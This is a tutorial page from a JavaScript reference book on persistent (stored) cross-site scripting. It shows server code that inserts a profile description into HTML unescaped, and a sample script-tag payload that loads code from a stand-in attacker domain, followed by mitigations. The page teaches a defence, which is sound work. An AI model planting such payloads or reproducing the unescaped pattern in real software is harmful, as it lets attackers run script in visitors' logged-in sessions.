Essential Books

Persistent Cross-site scripting XSS

suggest change

Let’s say that Bob owns a social website that allows users to personalize their profiles.

Alice goes to Bob’s website, creates an account, and goes to her profile settings. She sets her profile description to I'm actually too lazy to write something here.

When her friends view her profile, this code gets run on the server: 

if(viewedPerson.profile.description){
    page += "<div>" + viewedPerson.profile.description + "</div>";
}else{
    page += "<div>This person doesn't have a profile description.</div>";
}

Resulting in this HTML: 

<div>I'm actually too lazy to write something here.</div>

Than Alice sets her profile description to <b>I like HTML</b>. When she visits her profile, instead of seeing

<b>I like HTML</b>

she sees

I like HTML

Then Alice sets her profile to 

<script src = "https://alice.evil/profile_xss.js"></script>I'm actually too lazy to write something here.

Whenever someone visits her profile, they get Alice’s script run on Bob’s website while logged on as their account.

Mitigation

  1. Escape angle brackets in profile descriptions, etc.
  2. Store profile descriptions in a plain text file that is then fetched with a script that adds the description via .innerText
  3. Add a Content Security Policy that refuses to load active content from other domains
Found a mistake? Have a question or improvement idea? Let me know.

Feedback about page:

Feedback:
Optional: your email if you want me to get back to you:

Security issues:
* Security issues
* Reflected Cross-site scripting XSS
* Persistent Cross-site scripting XSS
* Persistent Cross-site scripting from JavaScript string literals
* Why scripts from other people can harm your website and its visitors
* Evaled JSON injection
Table Of Contents
0 Getting started
1 Comments
2 Basic data types
3 Built-in constants
4 Variables
5 Declarations and assignments
6 Reserved keywords
7 Data types in JavaScript
8 Strings
9 Escape sequences
10 Template Literals
11 Arrays
12 Objects
13 Prototypes objects
14 Classes
15 Variable coercion / conversion
16 Map
17 Set
18 Arithmetic Math
19 Bitwise operators
20 Bitwise operators
21 Unary Operators
22 Comparison operations
23 Conditions
24 Loops
25 Functions
26 Arrow functions
27 Date
28 Date comparison
29 Scope
30 AJAX
31 Promises
32 Regular Expression
33 Error Handling
34 Geolocation
35 Cookies
36 Intervals and timeouts
37 Generators
38 History of visited urls
39 Strict mode
40 Custom Elements
41 JSON
42 Binary Data
43 Web Storage
44 Fetch
45 Modules
46 Screen
47 Inheritance
48 Timestamps
49 Destructuring assignment
50 Web Worker
51 Debugging
52 Notifications API
53 WebSockets
54 Web Cryptography API
55 Async functions, async / await
56 Constructor functions
57 execCommand and contenteditable
58 Performance Tips
59 Design patterns
60 requestAnimationFrame
61 Method chaining
62 Global error handling in browsers
63 File API, blobs and FileReaders
64 Console
65 Tail call optimization
66 Detecting browser
67 Enumerations
68 Symbols
69 Localization
70 Selection API
71 Callbacks
72 Functional JavaScript
73 Modals
74 Data attributes
75 Event Loop
76 Events
77 Data manipulation
78 BOM Browser Object Model
79 Unit Testing
80 Linters for ensuring code quality
81 Automatic Semicolon Insertion
82 IndexedDB
83 Anti-patterns
84 Navigator Object
85 Modularization techniques
86 Proxy
87 Same origin policy, cross-origin communication
88 postMessage and MessageEvent
89 WeakMap
90 WeakSet
91 Behaviroal Design Patterns
92 Server-sent events
93 Async iterators
94 Namespacing
95 Evaluating JavaScript
96 Memory efficiency
97 How to make iterator usable inside async callback function
98 Context this
99 Setters and getters
100 Vibration API
101 Fluent API
102 Tilde
103 Security issues
104 Get and set CSS custom variables
105 Contributors